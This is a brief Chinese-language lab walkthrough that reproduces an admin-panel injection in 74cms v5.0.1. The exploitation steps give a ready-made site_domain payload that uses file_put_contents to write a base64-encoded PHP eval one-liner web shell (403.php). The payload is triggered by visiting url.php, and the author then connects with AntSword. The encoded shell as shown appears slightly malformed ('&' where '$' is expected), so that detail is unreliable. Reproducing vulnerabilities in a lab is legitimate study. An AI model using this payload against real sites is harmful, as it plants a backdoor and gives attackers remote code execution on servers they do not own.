一、环境搭建
这里用到PHPstudy+VMware+Windows7(IP:192.168.253.131)进行环境搭建,且是在本地进行测试。
1.首先在官网下载74cms v5.0.1版本的安装包:http://www.74cms.com/download/index.html
2.将下载好的压缩包文件解压并放至PHPstudy的WWW目录下。
3.打开 192.168.253.131/74cms_Home_Setup_v5.0.1/upload/install.php 并系统安装。
OK,系统安装完成。
二、漏洞利用
1.登录后台以后,点击保存网站配置的同时用burpsuite抓包。
2.修改site_domain的内容,这里对内容进行base64加密:site_domain=‘,file_put_contents(‘403.php’,base64_decode(‘PD9waHAgZXZhbCgmX1BPU1QoJzEyMycpKTs/Pg==’)),’
3.这里等号需要URL编码
4.再次访问:http://192.168.253.131/74cms_Home_Setup_v5.0.1/upload/Application/Common/Conf/url.php,使恶意语句成功执行。
5.一句话木马已被写入:
6.使用蚁剑连接:http://192.168.253.131/74cms_Home_Setup_v5.0.1/upload/Application/Common/Conf/403.php
OK,连接成功,over。